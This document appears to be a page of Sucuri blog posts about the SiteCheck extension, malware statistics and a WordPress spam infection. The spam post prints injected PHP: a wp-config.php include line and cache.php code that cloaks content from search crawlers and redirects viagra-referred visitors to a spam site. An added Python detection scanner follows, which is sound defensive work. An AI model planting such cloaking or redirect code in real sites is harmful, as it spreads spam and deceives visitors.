SiteCheck Chrome Extension Now Available

Have you ever wondered if the websites you (or your family) visit contain code that is potentially harmful to you or your computer? If you are a Chrome user, then you’re in luck because we’ve made it much simpler for you to utilize SiteCheck, our website malware scanner. Whether you want to scan your own website or check up on other sites, install our new Chrome extension to make it easier. If you love the extension, let us know in the comments and make sure to tell your friends about this cool new tool.

All right, we’re done selling the benefits of this thing so here are the instructions to install it and try it out for yourself:

First, install the extension from the Google Chrome Web Store.

Next, you’ll be asked to allow access to your webpages. Once you do that, you’ll notice the little Sucuri “S” embedded on the right of your toolbar.

[Image: SiteCheck Extension]

Finally, to scan any site you’re visiting, just click the Sucuri “S” and our sitecheck will scour the site and return results to you in no time. If you’re visiting a site infected with malware, you will receive a warning like the one below.

[Image: SiteCheck Extension - Warn results]

Some Technical Details

It’s important to remember that you will need to choose to scan sites when you visit them and that this extension will not automatically scan every site you visit, nor will it prevent you from visiting an infected or blacklisted site (though you could quickly find out if you were on such a site). Our goal is to help consumers of the web as well as webmasters by providing a tool to scan any site on the web without referring back to SiteCheck each time.

Finally, remember that this extension will not automate scans of any website. If you’re in need of consistent monitoring and alerts, just sign up for one of our website protection or prevention plans and let us keep your site malware-free.

WordPress SPAM Causing Headaches

It seems that SPAM is all the rage these days. Wonder why? Could it be because it’s a multi-million business?

In any event, detecting it is always a challenge, as is remediating it. This is what it might look like if you use our free scanner to scan the website:

[Image: Sucuri Spam Detection]

Besides some of the obvious things, we have started seeing tactics previously used on Joomla sites show up on WordPress ones. They are using things like this:


@require_once(ABSPATH . '/wp-includes/Text/cache.php');

You’ll find this in your wp-config.php file more often than not. If you follow the cookie trail you’ll find that the cache.php contains code like this:


<?php
$uniq_ua_string=@$_SERVER['HTTP_USER_AGENT'];
$uniq_ref=@$_SERVER["HTTP_REFERER"];
$is_human=1;
if (stristr($uniq_ua_string,"googlebot"))$is_human=0;
if (stristr($uniq_ua_string,"bing"))$is_human=0;
if (stristr($uniq_ua_string,"yahoo"))$is_human=0;
if(@$is_human == 0 && preg_match('/^\/(?:index\.(?:php|html?))?$/', @$_SERVER['REQUEST_URI'])) {
@readfile(dirname(__FILE__)."/css.php");
exit;
}
if(preg_match('/viagra/i', $uniq_ref) > 0) {header("Location: http://vaptk.com/in.php?t=v&s=1");exit;}

?>

If you follow the trail further and go to the css.php file you’ll find all kinds of goodies that will be of particular interest:

[Image: Sucuri SPAM Payload]

What can I say, sometimes it’s all about following the cookie trail.

When removing it, be sure to remove both the @require_once line and the payload. The good news is that if you’re running our plugin you’ll quickly identify an integrity issue in wp-includes and wp-config, which will allow you to act quickly to rectify the issue. Because of the time of injection we’d venture to say that the vector is likely compromised credentials to the server, likely via FTP.
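As an added example (not Sucuri's code and not part of the original post), the following Python scanner looks for the two patterns shown above: an error-suppressed include like the one injected into wp-config.php, and a PHP file that keys its output on crawler User-Agent strings or on the Referer. The sample files are constructed from the snippets in this post, the redirect host is a placeholder, and the function and rule names are assumptions of this example.

```python
import re

# Error-suppressed include/require, the form of the loader line shown above.
# The stock wp-config-sample.php loads wp-settings.php without the "@".
SUPPRESSED_INCLUDE = re.compile(r"@\s*(?:require|include)(?:_once)?\b[^;]*;", re.I)
# Crawler names the cache.php sample compares against the User-Agent.
CRAWLER_NAMES = re.compile(r"['\"](?:googlebot|bing|yahoo)['\"]", re.I)
READS_UA = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]")
READS_REFERER = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_REFERER['\"]\s*\]")
LOCATION = re.compile(r"header\s*\(\s*['\"]Location:", re.I)
SERVES_OTHER = re.compile(r"\breadfile\s*\(|header\s*\(\s*['\"]Location:", re.I)


def scan_php(path, source):
    """Return (path, rule, evidence) tuples for the text of one PHP file."""
    findings = []
    for m in SUPPRESSED_INCLUDE.finditer(source):
        findings.append((path, "suppressed-include", m.group(0).strip()))
    serves = SERVES_OTHER.search(source)
    if READS_UA.search(source) and CRAWLER_NAMES.search(source) and serves:
        findings.append((path, "crawler-cloaking", serves.group(0)))
    if READS_REFERER.search(source) and LOCATION.search(source):
        findings.append((path, "referer-redirect", "header(Location) keyed on Referer"))
    return findings


# Constructed samples modelled on the snippets in this post (placeholder redirect host).
SAMPLES = {
    "wp-config.php": "<?php\ndefine('DB_NAME', 'wp');\n"
        "@require_once(ABSPATH . '/wp-includes/Text/cache.php');\n"
        "require_once(ABSPATH . 'wp-settings.php');\n",
    "wp-includes/Text/cache.php": "<?php\n$ua=@$_SERVER['HTTP_USER_AGENT'];\n"
        "$ref=@$_SERVER[\"HTTP_REFERER\"];\n$is_human=1;\n"
        "if (stristr($ua,\"googlebot\"))$is_human=0;\n"
        "if(@$is_human == 0){@readfile(dirname(__FILE__).\"/css.php\");exit;}\n"
        "if(preg_match('/viagra/i', $ref) > 0)"
        "{header(\"Location: http://redirect.example/in.php\");exit;}\n",
    "wp-includes/version.php": "<?php\n$wp_version = '0.0';\n",
}


def scan_tree(files):
    """Scan a {path: source} mapping and return all findings in path order."""
    return [f for path, src in sorted(files.items()) for f in scan_php(path, src)]


if __name__ == "__main__":
    for finding in scan_tree(SAMPLES):
        print(finding)
```

Hits are leads for review rather than verdicts; confirm each one against a clean copy of the same WordPress version before removing anything.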


If you have any questions, let us know.

Sucuri SiteCheck Malware Scanner Plugin for WordPress

If you’re a WordPress user, love our free SiteCheck scanner, or already use our free SiteCheck Malware Scanner Plugin for WordPress, we have an update for you.

[Image: Sucuri Security - SiteCheck Malware Scanner]

Ask Sucuri: How does SiteCheck work?

If you have any questions about malware, blacklisting, or security in general, send them to us at contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.


Question: How does SiteCheck work? I just scanned a site that I think is compromised but the scanner is showing it as clean. Is my site really clean or did you make a mistake?

Answer: SiteCheck is our free, remote website scanner that works to identify if the provided site is infected with any type of malware (including SPAM) or if it’s been blacklisted or defaced.


Sucuri SiteCheck – Web Malware Distribution – January 2012

As many know, we have been offering our free website malware scanner – Sucuri SiteCheck, since early in 2011. In our commitment to continue to give back to the community, we want to share some statistics. We’d like to share the distribution of infections based on the number of sites that are being scanned using Sucuri SiteCheck.

In January, we scanned a couple hundred thousand sites. From those we were able to better understand the distribution of malware.

[Image: SiteCheck Web Malware Distro]